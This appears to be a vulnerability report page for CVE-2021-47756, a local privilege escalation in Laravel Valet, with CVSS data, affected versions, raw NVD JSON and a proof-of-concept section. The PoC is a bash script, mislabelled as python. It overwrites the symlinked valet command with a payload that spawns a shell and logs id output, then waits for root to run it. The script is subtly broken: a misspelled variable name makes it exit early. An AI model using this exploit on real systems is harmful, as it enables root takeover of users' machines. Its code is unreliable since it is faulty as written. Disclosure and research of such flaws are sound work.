Security Vulnerability Report
中文
CVE-2021-47756 CVSS 8.4 HIGH

CVE-2021-47756

Published: 2026-01-16 00:16:21
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Laravel Valet 1.1.4
Laravel Valet 1.x (1.1.4 - 1.x系列)
Laravel Valet 2.0.0
Laravel Valet 2.0.1
Laravel Valet 2.0.2
Laravel Valet 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2021-47756 Laravel Valet Local Privilege Escalation PoC # Usage: Run this script as a local user on a macOS system with Laravel Valet installed VAlET_PATH="/usr/local/bin/valet" BACKUP_FILE="/tmp/valet_backup_$$" # Check if valet command exists if [ ! -L "$VALET_PATH" ]; then echo "[-] Laravel Valet not found or not installed" exit 1 fi # Get the actual symlink target SYMLINK_TARGET=$(readlink "$VALET_PATH") echo "[+] Found valet symlink pointing to: $SYMLINK_TARGET" # Backup original file cp "$SYMLINK_TARGET" "$BACKUP_FILE" echo "[+] Backed up original file to: $BACKUP_FILE" # Create malicious payload echo '#!/bin/bash echo "[+] Privilege Escalation Successful!" id > /tmp/pwned_$(date +%s).txt bash -i' > "$SYMLINK_TARGET" chmod +x "$SYMLINK_TARGET" echo "[+] Modified valet command with malicious payload" # Trigger the vulnerability (requires sudo or root execution) echo "[!] Please wait for root user to execute 'valet' command..." echo "[!] Or manually run: sudo valet" echo "[+] Check /tmp/pwned_*.txt for proof of execution" # Restore original file (cleanup) sleep 5 cp "$BACKUP_FILE" "$SYMLINK_TARGET" rm -f "$BACKUP_FILE" echo "[+] Cleaned up - restored original file"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47756", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:20.750", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication."}, {"lang": "es", "value": "Las versiones 1.1.4 a 2.0.3 de Laravel Valet contienen una vulnerabilidad de escalada de privilegios local que permite a los usuarios modificar el comando valet con privilegios de root. Los atacantes pueden editar el comando valet con enlace simbólico para ejecutar código arbitrario con permisos de root sin autenticación adicional."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://laravel.com/docs/8.x/valet", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50591", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/laravel-valet-local-privilege-escalation-macos", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.